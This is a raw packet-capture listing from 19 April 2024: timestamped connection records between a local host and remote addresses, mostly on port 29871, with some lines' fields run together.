                                                                                            Apr 19, 2024 19:12:13.133377075 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:13.133394957 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:13.133410931 CEST4973929871192.168.2.4193.222.96.21
                                                                                            Apr 19, 2024 19:12:13.133411884 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:13.133430004 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:13.133433104 CEST4973929871192.168.2.4193.222.96.21
                                                                                            Apr 19, 2024 19:12:13.133449078 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:13.133466005 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:13.133466959 CEST4973929871192.168.2.4193.222.96.21
                                                                                            Apr 19, 2024 19:12:13.133482933 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:13.133501053 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:13.133517981 CEST4973929871192.168.2.4193.222.96.21
                                                                                            Apr 19, 2024 19:12:13.133518934 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:13.133537054 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:13.133539915 CEST4973929871192.168.2.4193.222.96.21
                                                                                            Apr 19, 2024 19:12:13.133554935 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:13.133572102 CEST4973929871192.168.2.4193.222.96.21
                                                                                            Apr 19, 2024 19:12:13.133573055 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:13.133590937 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:13.133610010 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:13.133627892 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:13.133629084 CEST4973929871192.168.2.4193.222.96.21
                                                                                            Apr 19, 2024 19:12:13.133647919 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:13.133651972 CEST4973929871192.168.2.4193.222.96.21
                                                                                            Apr 19, 2024 19:12:13.133666992 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:13.133683920 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:13.133702040 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:13.133702993 CEST4973929871192.168.2.4193.222.96.21
                                                                                            Apr 19, 2024 19:12:13.133727074 CEST4973929871192.168.2.4193.222.96.21
                                                                                            Apr 19, 2024 19:12:13.133738041 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:13.133754969 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:13.133776903 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:13.133795023 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:13.133804083 CEST4973929871192.168.2.4193.222.96.21
                                                                                            Apr 19, 2024 19:12:13.133812904 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:13.133820057 CEST4973929871192.168.2.4193.222.96.21
                                                                                            Apr 19, 2024 19:12:13.133831024 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:13.133846045 CEST4973929871192.168.2.4193.222.96.21
                                                                                            Apr 19, 2024 19:12:13.133848906 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:13.133867979 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:13.133883953 CEST4973929871192.168.2.4193.222.96.21
                                                                                            Apr 19, 2024 19:12:13.133886099 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:13.133904934 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:13.133925915 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:13.133944035 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:13.133949041 CEST4973929871192.168.2.4193.222.96.21
                                                                                            Apr 19, 2024 19:12:13.133961916 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:13.133970976 CEST4973929871192.168.2.4193.222.96.21
                                                                                            Apr 19, 2024 19:12:13.133980989 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:13.133995056 CEST4973929871192.168.2.4193.222.96.21
                                                                                            Apr 19, 2024 19:12:13.133997917 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:13.134016037 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:13.134032965 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:13.134037018 CEST4973929871192.168.2.4193.222.96.21
                                                                                            Apr 19, 2024 19:12:13.134049892 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:13.134082079 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:13.134098053 CEST4973929871192.168.2.4193.222.96.21
                                                                                            Apr 19, 2024 19:12:13.134099960 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:13.134118080 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:13.134119987 CEST4973929871192.168.2.4193.222.96.21
                                                                                            Apr 19, 2024 19:12:13.134135962 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:13.134154081 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:13.134174109 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:13.134181976 CEST4973929871192.168.2.4193.222.96.21
                                                                                            Apr 19, 2024 19:12:13.134192944 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:13.134202003 CEST4973929871192.168.2.4193.222.96.21
                                                                                            Apr 19, 2024 19:12:13.134211063 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:13.134224892 CEST4973929871192.168.2.4193.222.96.21
                                                                                            Apr 19, 2024 19:12:13.134231091 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:13.134248972 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:13.134265900 CEST4973929871192.168.2.4193.222.96.21
                                                                                            Apr 19, 2024 19:12:13.134267092 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:13.134284973 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:13.134304047 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:13.134320974 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:13.134326935 CEST4973929871192.168.2.4193.222.96.21
                                                                                            Apr 19, 2024 19:12:13.134342909 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:13.134351015 CEST4973929871192.168.2.4193.222.96.21
                                                                                            Apr 19, 2024 19:12:13.134361029 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:13.134380102 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:13.134382963 CEST4973929871192.168.2.4193.222.96.21
                                                                                            Apr 19, 2024 19:12:13.134398937 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:13.134417057 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:13.134419918 CEST4973929871192.168.2.4193.222.96.21
                                                                                            Apr 19, 2024 19:12:13.134434938 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:13.134453058 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:13.134459019 CEST4973929871192.168.2.4193.222.96.21
                                                                                            Apr 19, 2024 19:12:13.134469986 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:13.134488106 CEST2987149739193.222.96.21192.168.2.4
Apr 19, 2024 19:12:13.134504080 CEST  49739  29871  192.168.2.4    193.222.96.21
Apr 19, 2024 19:12:13.134505033 CEST  29871  49739  193.222.96.21  192.168.2.4
Apr 19, 2024 19:12:13.134524107 CEST  29871  49739  193.222.96.21  192.168.2.4
Apr 19, 2024 19:12:13.134525061 CEST  49739  29871  192.168.2.4    193.222.96.21
Apr 19, 2024 19:12:13.134541988 CEST  29871  49739  193.222.96.21  192.168.2.4
Apr 19, 2024 19:12:13.134561062 CEST  29871  49739  193.222.96.21  192.168.2.4
Apr 19, 2024 19:12:13.134577036 CEST  49739  29871  192.168.2.4    193.222.96.21
Apr 19, 2024 19:12:13.134577990 CEST  29871  49739  193.222.96.21  192.168.2.4
Apr 19, 2024 19:12:13.134598017 CEST  49739  29871  192.168.2.4    193.222.96.21
Apr 19, 2024 19:12:13.134599924 CEST  29871  49739  193.222.96.21  192.168.2.4
Apr 19, 2024 19:12:13.134618044 CEST  29871  49739  193.222.96.21  192.168.2.4
Apr 19, 2024 19:12:13.134634972 CEST  29871  49739  193.222.96.21  192.168.2.4
Apr 19, 2024 19:12:13.134653091 CEST  29871  49739  193.222.96.21  192.168.2.4
Apr 19, 2024 19:12:13.134658098 CEST  49739  29871  192.168.2.4    193.222.96.21
Apr 19, 2024 19:12:13.134671926 CEST  29871  49739  193.222.96.21  192.168.2.4
Apr 19, 2024 19:12:13.134675980 CEST  49739  29871  192.168.2.4    193.222.96.21
Apr 19, 2024 19:12:13.134690046 CEST  29871  49739  193.222.96.21  192.168.2.4
Apr 19, 2024 19:12:13.134708881 CEST  29871  49739  193.222.96.21  192.168.2.4
Apr 19, 2024 19:12:13.134725094 CEST  49739  29871  192.168.2.4    193.222.96.21
Apr 19, 2024 19:12:13.134727955 CEST  29871  49739  193.222.96.21  192.168.2.4
Apr 19, 2024 19:12:13.134746075 CEST  49739  29871  192.168.2.4    193.222.96.21
Apr 19, 2024 19:12:13.134747028 CEST  29871  49739  193.222.96.21  192.168.2.4
Apr 19, 2024 19:12:13.134764910 CEST  29871  49739  193.222.96.21  192.168.2.4
Apr 19, 2024 19:12:13.134784937 CEST  29871  49739  193.222.96.21  192.168.2.4
Apr 19, 2024 19:12:13.134800911 CEST  49739  29871  192.168.2.4    193.222.96.21
Apr 19, 2024 19:12:13.134803057 CEST  29871  49739  193.222.96.21  192.168.2.4
Apr 19, 2024 19:12:13.134820938 CEST  29871  49739  193.222.96.21  192.168.2.4
Apr 19, 2024 19:12:13.134824038 CEST  49739  29871  192.168.2.4    193.222.96.21
Apr 19, 2024 19:12:13.134841919 CEST  29871  49739  193.222.96.21  192.168.2.4
Apr 19, 2024 19:12:13.134859085 CEST  29871  49739  193.222.96.21  192.168.2.4
Apr 19, 2024 19:12:13.134876013 CEST  49739  29871  192.168.2.4    193.222.96.21
Apr 19, 2024 19:12:13.134877920 CEST  29871  49739  193.222.96.21  192.168.2.4
Apr 19, 2024 19:12:13.134896040 CEST  29871  49739  193.222.96.21  192.168.2.4
Apr 19, 2024 19:12:13.134897947 CEST  49739  29871  192.168.2.4    193.222.96.21
Apr 19, 2024 19:12:13.134916067 CEST  29871  49739  193.222.96.21  192.168.2.4
Apr 19, 2024 19:12:13.134933949 CEST  29871  49739  193.222.96.21  192.168.2.4
Apr 19, 2024 19:12:13.134951115 CEST  29871  49739  193.222.96.21  192.168.2.4
Apr 19, 2024 19:12:13.134951115 CEST  49739  29871  192.168.2.4    193.222.96.21
Apr 19, 2024 19:12:13.134968996 CEST  29871  49739  193.222.96.21  192.168.2.4
Apr 19, 2024 19:12:13.134974003 CEST  49739  29871  192.168.2.4    193.222.96.21
Apr 19, 2024 19:12:13.134985924 CEST  29871  49739  193.222.96.21  192.168.2.4
Apr 19, 2024 19:12:13.135003090 CEST  29871  49739  193.222.96.21  192.168.2.4
Apr 19, 2024 19:12:13.135004044 CEST  49739  29871  192.168.2.4    193.222.96.21
Apr 19, 2024 19:12:13.135020971 CEST  29871  49739  193.222.96.21  192.168.2.4
Apr 19, 2024 19:12:13.135039091 CEST  29871  49739  193.222.96.21  192.168.2.4
Apr 19, 2024 19:12:13.135056019 CEST  29871  49739  193.222.96.21  192.168.2.4
Apr 19, 2024 19:12:13.135056973 CEST  49739  29871  192.168.2.4    193.222.96.21
Apr 19, 2024 19:12:13.135073900 CEST  29871  49739  193.222.96.21  192.168.2.4
Apr 19, 2024 19:12:13.135075092 CEST  49739  29871  192.168.2.4    193.222.96.21
Apr 19, 2024 19:12:13.135092020 CEST  29871  49739  193.222.96.21  192.168.2.4
Apr 19, 2024 19:12:13.135109901 CEST  29871  49739  193.222.96.21  192.168.2.4
Apr 19, 2024 19:12:13.135124922 CEST  49739  29871  192.168.2.4    193.222.96.21
Apr 19, 2024 19:12:13.135127068 CEST  29871  49739  193.222.96.21  192.168.2.4
Apr 19, 2024 19:12:13.135145903 CEST  49739  29871  192.168.2.4    193.222.96.21
Apr 19, 2024 19:12:13.135145903 CEST  29871  49739  193.222.96.21  192.168.2.4
Apr 19, 2024 19:12:13.135174990 CEST  29871  49739  193.222.96.21  192.168.2.4
Apr 19, 2024 19:12:13.135193110 CEST  29871  49739  193.222.96.21  192.168.2.4
Apr 19, 2024 19:12:13.135209084 CEST  49739  29871  192.168.2.4    193.222.96.21
Apr 19, 2024 19:12:13.135212898 CEST  29871  49739  193.222.96.21  192.168.2.4
Apr 19, 2024 19:12:13.135231018 CEST  29871  49739  193.222.96.21  192.168.2.4
Apr 19, 2024 19:12:13.135231972 CEST  49739  29871  192.168.2.4    193.222.96.21
Apr 19, 2024 19:12:13.135251045 CEST  29871  49739  193.222.96.21  192.168.2.4
Apr 19, 2024 19:12:13.135267973 CEST  29871  49739  193.222.96.21  192.168.2.4
Apr 19, 2024 19:12:13.135282993 CEST  49739  29871  192.168.2.4    193.222.96.21
Apr 19, 2024 19:12:13.135287046 CEST  29871  49739  193.222.96.21  192.168.2.4
Apr 19, 2024 19:12:13.135303974 CEST  49739  29871  192.168.2.4    193.222.96.21
Apr 19, 2024 19:12:13.135305882 CEST  29871  49739  193.222.96.21  192.168.2.4
Apr 19, 2024 19:12:13.135323048 CEST  29871  49739  193.222.96.21  192.168.2.4
Apr 19, 2024 19:12:13.135339975 CEST  29871  49739  193.222.96.21  192.168.2.4
Apr 19, 2024 19:12:13.135356903 CEST  49739  29871  192.168.2.4    193.222.96.21
Apr 19, 2024 19:12:13.135356903 CEST  29871  49739  193.222.96.21  192.168.2.4
Apr 19, 2024 19:12:13.135376930 CEST  29871  49739  193.222.96.21  192.168.2.4
Apr 19, 2024 19:12:13.135377884 CEST  49739  29871  192.168.2.4    193.222.96.21
Apr 19, 2024 19:12:13.137165070 CEST  49739  29871  192.168.2.4    193.222.96.21
Apr 19, 2024 19:12:13.230597019 CEST     80  49740  178.237.33.50  192.168.2.4
Apr 19, 2024 19:12:13.231190920 CEST  49740     80  192.168.2.4    178.237.33.50
Apr 19, 2024 19:12:13.334693909 CEST  29871  49739  193.222.96.21  192.168.2.4
Apr 19, 2024 19:12:13.334727049 CEST  29871  49739  193.222.96.21  192.168.2.4
Apr 19, 2024 19:12:13.334745884 CEST  29871  49739  193.222.96.21  192.168.2.4
Apr 19, 2024 19:12:13.334763050 CEST  29871  49739  193.222.96.21  192.168.2.4
Apr 19, 2024 19:12:13.334783077 CEST  29871  49739  193.222.96.21  192.168.2.4
Apr 19, 2024 19:12:13.334804058 CEST  29871  49739  193.222.96.21  192.168.2.4
Apr 19, 2024 19:12:13.334822893 CEST  29871  49739  193.222.96.21  192.168.2.4
Apr 19, 2024 19:12:13.334845066 CEST  29871  49739  193.222.96.21  192.168.2.4
Apr 19, 2024 19:12:13.334907055 CEST  49739  29871  192.168.2.4    193.222.96.21
Apr 19, 2024 19:12:13.334907055 CEST  49739  29871  192.168.2.4    193.222.96.21
Apr 19, 2024 19:12:13.334908009 CEST  49739  29871  192.168.2.4    193.222.96.21
Apr 19, 2024 19:12:13.334908009 CEST  49739  29871  192.168.2.4    193.222.96.21
Apr 19, 2024 19:12:13.335630894 CEST  29871  49739  193.222.96.21  192.168.2.4
Apr 19, 2024 19:12:13.335678101 CEST  29871  49739  193.222.96.21  192.168.2.4
Apr 19, 2024 19:12:13.335699081 CEST  29871  49739  193.222.96.21  192.168.2.4
Apr 19, 2024 19:12:13.335716009 CEST  29871  49739  193.222.96.21  192.168.2.4
Apr 19, 2024 19:12:13.335756063 CEST  49739  29871  192.168.2.4    193.222.96.21
Apr 19, 2024 19:12:13.335793972 CEST  49739  29871  192.168.2.4    193.222.96.21
Apr 19, 2024 19:12:13.337254047 CEST  29871  49739  193.222.96.21  192.168.2.4
Apr 19, 2024 19:12:13.337388992 CEST  29871  49739  193.222.96.21  192.168.2.4
Apr 19, 2024 19:12:13.337407112 CEST  29871  49739  193.222.96.21  192.168.2.4
Apr 19, 2024 19:12:13.337429047 CEST  29871  49739  193.222.96.21  192.168.2.4
Apr 19, 2024 19:12:13.337446928 CEST  29871  49739  193.222.96.21  192.168.2.4
Apr 19, 2024 19:12:13.337464094 CEST  29871  49739  193.222.96.21  192.168.2.4
Apr 19, 2024 19:12:13.337455034 CEST  49739  29871  192.168.2.4    193.222.96.21
Apr 19, 2024 19:12:13.337486982 CEST  29871  49739  193.222.96.21  192.168.2.4
Apr 19, 2024 19:12:13.337505102 CEST  29871  49739  193.222.96.21  192.168.2.4
Apr 19, 2024 19:12:13.337523937 CEST  29871  49739  193.222.96.21  192.168.2.4
Apr 19, 2024 19:12:13.337524891 CEST  49739  29871  192.168.2.4    193.222.96.21
Apr 19, 2024 19:12:13.337524891 CEST  49739  29871  192.168.2.4    193.222.96.21
Apr 19, 2024 19:12:13.337548018 CEST  49739  29871  192.168.2.4    193.222.96.21
Apr 19, 2024 19:12:13.337572098 CEST  29871  49739  193.222.96.21  192.168.2.4
Apr 19, 2024 19:12:13.337590933 CEST  29871  49739  193.222.96.21  192.168.2.4
Apr 19, 2024 19:12:13.337609053 CEST  29871  49739  193.222.96.21  192.168.2.4
Apr 19, 2024 19:12:13.337625980 CEST  29871  49739  193.222.96.21  192.168.2.4
Apr 19, 2024 19:12:13.337634087 CEST  49739  29871  192.168.2.4    193.222.96.21
Apr 19, 2024 19:12:13.337642908 CEST  29871  49739  193.222.96.21  192.168.2.4
Apr 19, 2024 19:12:13.337655067 CEST  49739  29871  192.168.2.4    193.222.96.21
Apr 19, 2024 19:12:13.337661028 CEST  29871  49739  193.222.96.21  192.168.2.4
Apr 19, 2024 19:12:13.337677956 CEST  29871  49739  193.222.96.21  192.168.2.4
Apr 19, 2024 19:12:13.337696075 CEST  29871  49739  193.222.96.21  192.168.2.4
Apr 19, 2024 19:12:13.337704897 CEST  49739  29871  192.168.2.4    193.222.96.21
Apr 19, 2024 19:12:13.337713957 CEST  29871  49739  193.222.96.21  192.168.2.4
Apr 19, 2024 19:12:13.337728024 CEST  49739  29871  192.168.2.4    193.222.96.21
Apr 19, 2024 19:12:13.337733030 CEST  29871  49739  193.222.96.21  192.168.2.4
Apr 19, 2024 19:12:13.337750912 CEST  29871  49739  193.222.96.21  192.168.2.4
Apr 19, 2024 19:12:13.337769032 CEST  29871  49739  193.222.96.21  192.168.2.4
Apr 19, 2024 19:12:13.337774992 CEST  49739  29871  192.168.2.4    193.222.96.21
Apr 19, 2024 19:12:13.337786913 CEST  29871  49739  193.222.96.21  192.168.2.4
Apr 19, 2024 19:12:13.337804079 CEST  49739  29871  192.168.2.4    193.222.96.21
Apr 19, 2024 19:12:13.337805986 CEST  29871  49739  193.222.96.21  192.168.2.4
Apr 19, 2024 19:12:13.337822914 CEST  29871  49739  193.222.96.21  192.168.2.4
Apr 19, 2024 19:12:13.337840080 CEST  29871  49739  193.222.96.21  192.168.2.4
Apr 19, 2024 19:12:13.337847948 CEST  49739  29871  192.168.2.4    193.222.96.21
Apr 19, 2024 19:12:13.337857008 CEST  29871  49739  193.222.96.21  192.168.2.4
Apr 19, 2024 19:12:13.337867022 CEST  49739  29871  192.168.2.4    193.222.96.21
Apr 19, 2024 19:12:13.337876081 CEST  29871  49739  193.222.96.21  192.168.2.4
Apr 19, 2024 19:12:13.337893963 CEST  29871  49739  193.222.96.21  192.168.2.4
Apr 19, 2024 19:12:13.337899923 CEST  49739  29871  192.168.2.4    193.222.96.21
Apr 19, 2024 19:12:13.337910891 CEST  29871  49739  193.222.96.21  192.168.2.4
Apr 19, 2024 19:12:13.337929010 CEST  29871  49739  193.222.96.21  192.168.2.4
Apr 19, 2024 19:12:13.337945938 CEST  29871  49739  193.222.96.21  192.168.2.4
Apr 19, 2024 19:12:13.337949038 CEST  49739  29871  192.168.2.4    193.222.96.21
Apr 19, 2024 19:12:13.337963104 CEST  29871  49739  193.222.96.21  192.168.2.4
Apr 19, 2024 19:12:13.337971926 CEST  49739  29871  192.168.2.4    193.222.96.21
Apr 19, 2024 19:12:13.337980032 CEST  29871  49739  193.222.96.21  192.168.2.4
Apr 19, 2024 19:12:13.337996960 CEST  29871  49739  193.222.96.21  192.168.2.4
Apr 19, 2024 19:12:13.338016033 CEST  29871  49739  193.222.96.21  192.168.2.4
Apr 19, 2024 19:12:13.338018894 CEST  49739  29871  192.168.2.4    193.222.96.21
Apr 19, 2024 19:12:13.338035107 CEST  29871  49739  193.222.96.21  192.168.2.4
Apr 19, 2024 19:12:13.338052034 CEST  29871  49739  193.222.96.21  192.168.2.4
Apr 19, 2024 19:12:13.338062048 CEST  49739  29871  192.168.2.4    193.222.96.21
Apr 19, 2024 19:12:13.338068962 CEST  29871  49739  193.222.96.21  192.168.2.4
Apr 19, 2024 19:12:13.338085890 CEST  49739  29871  192.168.2.4    193.222.96.21
Apr 19, 2024 19:12:13.338087082 CEST  29871  49739  193.222.96.21  192.168.2.4
Apr 19, 2024 19:12:13.338105917 CEST  29871  49739  193.222.96.21  192.168.2.4
Apr 19, 2024 19:12:13.338123083 CEST  29871  49739  193.222.96.21  192.168.2.4
Apr 19, 2024 19:12:13.338131905 CEST  49739  29871  192.168.2.4    193.222.96.21
Apr 19, 2024 19:12:13.338141918 CEST  29871  49739  193.222.96.21  192.168.2.4
Apr 19, 2024 19:12:13.338152885 CEST  49739  29871  192.168.2.4    193.222.96.21
Apr 19, 2024 19:12:13.338160038 CEST  29871  49739  193.222.96.21  192.168.2.4
Apr 19, 2024 19:12:13.338176012 CEST  29871  49739  193.222.96.21  192.168.2.4
Apr 19, 2024 19:12:13.338192940 CEST  29871  49739  193.222.96.21  192.168.2.4
Apr 19, 2024 19:12:13.338205099 CEST  49739  29871  192.168.2.4    193.222.96.21
Apr 19, 2024 19:12:13.338211060 CEST  29871  49739  193.222.96.21  192.168.2.4
Apr 19, 2024 19:12:13.338227987 CEST  49739  29871  192.168.2.4    193.222.96.21
Apr 19, 2024 19:12:13.338229895 CEST  29871  49739  193.222.96.21  192.168.2.4
Apr 19, 2024 19:12:13.338248968 CEST  29871  49739  193.222.96.21  192.168.2.4
Apr 19, 2024 19:12:13.338265896 CEST  29871  49739  193.222.96.21  192.168.2.4
Apr 19, 2024 19:12:13.338285923 CEST  29871  49739  193.222.96.21  192.168.2.4
Apr 19, 2024 19:12:13.338288069 CEST  49739  29871  192.168.2.4    193.222.96.21
Apr 19, 2024 19:12:13.338288069 CEST  49739  29871  192.168.2.4    193.222.96.21
Apr 19, 2024 19:12:13.338303089 CEST  29871  49739  193.222.96.21  192.168.2.4
Apr 19, 2024 19:12:13.338321924 CEST  29871  49739  193.222.96.21  192.168.2.4
Apr 19, 2024 19:12:13.338337898 CEST  29871  49739  193.222.96.21  192.168.2.4
Apr 19, 2024 19:12:13.338340044 CEST  49739  29871  192.168.2.4    193.222.96.21
Apr 19, 2024 19:12:13.338356018 CEST  29871  49739  193.222.96.21  192.168.2.4
Apr 19, 2024 19:12:13.338361025 CEST  49739  29871  192.168.2.4    193.222.96.21
Apr 19, 2024 19:12:13.338373899 CEST  29871  49739  193.222.96.21  192.168.2.4
Apr 19, 2024 19:12:13.338392019 CEST  29871  49739  193.222.96.21  192.168.2.4
Apr 19, 2024 19:12:13.338407993 CEST  29871  49739  193.222.96.21  192.168.2.4
Apr 19, 2024 19:12:13.338416100 CEST  49739  29871  192.168.2.4    193.222.96.21
Apr 19, 2024 19:12:13.338426113 CEST  29871  49739  193.222.96.21  192.168.2.4
Apr 19, 2024 19:12:13.338434935 CEST  49739  29871  192.168.2.4    193.222.96.21
Apr 19, 2024 19:12:13.338444948 CEST  29871  49739  193.222.96.21  192.168.2.4
Apr 19, 2024 19:12:13.338462114 CEST  29871  49739  193.222.96.21  192.168.2.4
Apr 19, 2024 19:12:13.338479042 CEST  29871  49739  193.222.96.21  192.168.2.4
Apr 19, 2024 19:12:13.338488102 CEST  49739  29871  192.168.2.4    193.222.96.21
Apr 19, 2024 19:12:13.338495970 CEST  29871  49739  193.222.96.21  192.168.2.4
Apr 19, 2024 19:12:13.338507891 CEST  49739  29871  192.168.2.4    193.222.96.21
Apr 19, 2024 19:12:13.338515043 CEST  29871  49739  193.222.96.21  192.168.2.4
Apr 19, 2024 19:12:13.338531971 CEST  29871  49739  193.222.96.21  192.168.2.4
Apr 19, 2024 19:12:13.338538885 CEST  49739  29871  192.168.2.4    193.222.96.21
Apr 19, 2024 19:12:13.338550091 CEST  29871  49739  193.222.96.21  192.168.2.4
Apr 19, 2024 19:12:13.338566065 CEST  29871  49739  193.222.96.21  192.168.2.4
Apr 19, 2024 19:12:13.338583946 CEST  29871  49739  193.222.96.21  192.168.2.4
Apr 19, 2024 19:12:13.338592052 CEST  49739  29871  192.168.2.4    193.222.96.21
Apr 19, 2024 19:12:13.338602066 CEST  29871  49739  193.222.96.21  192.168.2.4
Apr 19, 2024 19:12:13.338610888 CEST  49739  29871  192.168.2.4    193.222.96.21
Apr 19, 2024 19:12:13.338622093 CEST  29871  49739  193.222.96.21  192.168.2.4
Apr 19, 2024 19:12:13.338639975 CEST  29871  49739  193.222.96.21  192.168.2.4
Apr 19, 2024 19:12:13.338656902 CEST  29871  49739  193.222.96.21  192.168.2.4
Apr 19, 2024 19:12:13.338663101 CEST  49739  29871  192.168.2.4    193.222.96.21
Apr 19, 2024 19:12:13.338675976 CEST  29871  49739  193.222.96.21  192.168.2.4
Apr 19, 2024 19:12:13.338681936 CEST  49739  29871  192.168.2.4    193.222.96.21
Apr 19, 2024 19:12:13.338695049 CEST  29871  49739  193.222.96.21  192.168.2.4
Apr 19, 2024 19:12:13.338711977 CEST  29871  49739  193.222.96.21  192.168.2.4
Apr 19, 2024 19:12:13.338720083 CEST  49739  29871  192.168.2.4    193.222.96.21
Apr 19, 2024 19:12:13.338728905 CEST  29871  49739  193.222.96.21  192.168.2.4
Apr 19, 2024 19:12:13.338747978 CEST  29871  49739  193.222.96.21  192.168.2.4
Apr 19, 2024 19:12:13.338764906 CEST  29871  49739  193.222.96.21  192.168.2.4
Apr 19, 2024 19:12:13.338771105 CEST  49739  29871  192.168.2.4    193.222.96.21
Apr 19, 2024 19:12:13.338783026 CEST  29871  49739  193.222.96.21  192.168.2.4
Apr 19, 2024 19:12:13.338789940 CEST  49739  29871  192.168.2.4    193.222.96.21
Apr 19, 2024 19:12:13.338803053 CEST  29871  49739  193.222.96.21  192.168.2.4
Apr 19, 2024 19:12:13.338821888 CEST  29871  49739  193.222.96.21  192.168.2.4
Apr 19, 2024 19:12:13.338839054 CEST  29871  49739  193.222.96.21  192.168.2.4
Apr 19, 2024 19:12:13.338850021 CEST  49739  29871  192.168.2.4    193.222.96.21
Apr 19, 2024 19:12:13.338857889 CEST  29871  49739  193.222.96.21  192.168.2.4
Apr 19, 2024 19:12:13.338871002 CEST  49739  29871  192.168.2.4    193.222.96.21
Apr 19, 2024 19:12:13.338876963 CEST  29871  49739  193.222.96.21  192.168.2.4
Apr 19, 2024 19:12:13.338893890 CEST  29871  49739  193.222.96.21  192.168.2.4
Apr 19, 2024 19:12:13.338912964 CEST  29871  49739  193.222.96.21  192.168.2.4
Apr 19, 2024 19:12:13.338917971 CEST  49739  29871  192.168.2.4    193.222.96.21
Apr 19, 2024 19:12:13.338928938 CEST  29871  49739  193.222.96.21  192.168.2.4
Apr 19, 2024 19:12:13.338937044 CEST  49739  29871  192.168.2.4    193.222.96.21
Apr 19, 2024 19:12:13.338954926 CEST  29871  49739  193.222.96.21  192.168.2.4
                                                                                            Apr 19, 2024 19:12:13.338973999 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:13.338990927 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:13.339000940 CEST4973929871192.168.2.4193.222.96.21
                                                                                            Apr 19, 2024 19:12:13.339008093 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:13.339023113 CEST4973929871192.168.2.4193.222.96.21
                                                                                            Apr 19, 2024 19:12:13.339027882 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:13.339045048 CEST4973929871192.168.2.4193.222.96.21
                                                                                            Apr 19, 2024 19:12:13.339046001 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:13.339065075 CEST2987149739193.222.96.21192.168.2.4
